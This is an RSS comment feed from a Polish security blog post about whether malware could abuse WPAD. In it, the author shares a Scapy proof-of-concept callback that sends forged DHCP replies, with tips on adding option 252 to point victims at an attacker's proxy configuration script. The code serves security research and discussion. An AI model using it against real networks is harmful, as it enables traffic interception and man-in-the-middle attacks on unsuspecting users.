https://archive.mroczna-zaloga.org/ Paweł Goleń, blog - Zrzędzenie starego zgreda pl Serendipity - http://www.s9y.org/ Sat, 15 Mar 2025 22:14:25 GMT https://archive.mroczna-zaloga.org/templates/bulletproof/img/s9y_banner_small.png https://archive.mroczna-zaloga.org/ 100 21 https://archive.mroczna-zaloga.org/archives/867-czy-wpad-moze-sie-przydac-malware.html#c2518 https://archive.mroczna-zaloga.org/archives/867-czy-wpad-moze-sie-przydac-malware.html#comments https://archive.mroczna-zaloga.org/wfwcomment.php?cid=867 nospam@example.com (Paweł Goleń) Główna "funkcja" wygląda mniej więcej tak (wcięcia!): def dhcp_callback(pkt): global fake if pkt.haslayer(DHCP): if fake and pkt[DHCP].options[0][1] == 8: fake[Ether].dst = pkt[Ether].src fake[IP].dst = pkt[IP].src fake[BOOTP].xid = pkt[BOOTP].xid fake[BOOTP].ciaddr = pkt[IP].src fake[BOOTP].yiaddr = pkt[IP].src fake[BOOTP].siaddr = '172.16.0.254' fake[BOOTP].chaddr = pkt[BOOTP].chaddr sendp(fake) Podrabiany pakiet przygotowałem ręcznie, adres siaddr też wpisałem na sztywno, bo to tylko PoC w końcu. Dorzucenie opcji 252 to tylko dorzucenie do pkt[DHCP].options (252, "adres-do-skryptu-pac"). Można to rozwinąć preparując "szablon" pakietu na podstawie podsłuchanej odpowiedzi serwera DHCP, czyli najpierw czekamy na pierwszy pakiet z odpowiedzią, zapamiętujemy go, a później jak się pojawi pytanie, odsyłamy go odpowiednio wcześniej modyfikując. Wed, 02 Jun 2010 20:07:47 +0200 https://archive.mroczna-zaloga.org/archives/867-guid.html#c2518 https://archive.mroczna-zaloga.org/archives/867-czy-wpad-moze-sie-przydac-malware.html#c2511 https://archive.mroczna-zaloga.org/archives/867-czy-wpad-moze-sie-przydac-malware.html#comments https://archive.mroczna-zaloga.org/wfwcomment.php?cid=867 nospam@example.com (SuperDaemon) ad @edit1 udostepnisz src? Wed, 02 Jun 2010 08:42:56 +0200 https://archive.mroczna-zaloga.org/archives/867-guid.html#c2511